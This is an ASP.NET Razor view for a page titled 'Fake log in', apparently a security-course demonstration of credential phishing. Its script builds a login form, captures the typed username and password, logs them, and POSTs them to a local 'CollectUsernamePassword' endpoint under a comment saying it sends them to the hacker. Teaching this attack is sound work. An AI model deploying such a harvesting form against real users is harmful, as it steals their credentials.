@model M183.ViewModels.LoginViewModel
@{
    ViewBag.Title = "Log in";
}

<h2>Fake log in - Log in</h2>
<div class="row">
    <div id="dem" class="col-lg-6 col-lg-offset-0">
        @* form goes here *@
    </div>
</div>
<div>
    <p>@Html.ActionLink("Go Back", "Index", "Home")</p>
</div>

<script type="text/javascript">
    var colDiv = document.getElementById("dem");

    //login form
    var loginForm = document.createElement("form");
    loginForm.setAttribute("method", "POST");
    loginForm.setAttribute("action", "");
    loginForm.setAttribute("id", "loginForm");
    loginForm.setAttribute("class", "well");

    //username field
    var usernameLabel = document.createElement("label");
    usernameLabel.appendChild(document.createTextNode("Username:"));

    var usernameInput = document.createElement("input");
    usernameInput.setAttribute("type", "text");
    usernameInput.setAttribute("id", "usernameInput");
    usernameInput.setAttribute("class", "form-control");

    //password field
    var passwordLabel = document.createElement("label");
    passwordLabel.appendChild(document.createTextNode("Password:"));

    var passwordInput = document.createElement("input");
    passwordInput.setAttribute("type", "password");
    passwordInput.setAttribute("id", "passwordInput");
    passwordInput.setAttribute("class", "form-control");

    //login button
    var loginButton = document.createElement("input");
    loginButton.setAttribute("type", "submit");
    loginButton.setAttribute("value", "Log in");
    loginButton.setAttribute("id", "loginInput");
    loginButton.setAttribute("class", "btn btn-primary");

    //append child elements
    colDiv.appendChild(loginForm);
    loginForm.appendChild(usernameLabel);
    loginForm.appendChild(usernameInput);
    loginForm.appendChild(document.createElement("br"));
    loginForm.appendChild(passwordLabel);
    loginForm.appendChild(passwordInput);
    loginForm.appendChild(document.createElement("br"));
    loginForm.appendChild(loginButton);

    // add event listener to submit button
    loginForm.addEventListener("submit", function (e) {
        e.preventDefault();
        e.stopPropagation();

        var username = document.getElementById("usernameInput").value
        var password = document.getElementById("passwordInput").value

        //press f12 to see the logged result
        console.log("Username: " + username + " Password: " + password);

        // send the credentials to hacker
        var xhr = new XMLHttpRequest();
        xhr.open('POST', 'http://localhost:' + window.location.port + '/API/CollectUsernamePassword');
        xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        xhr.send('username=' + username + '&password=' + password);
    })
</script>



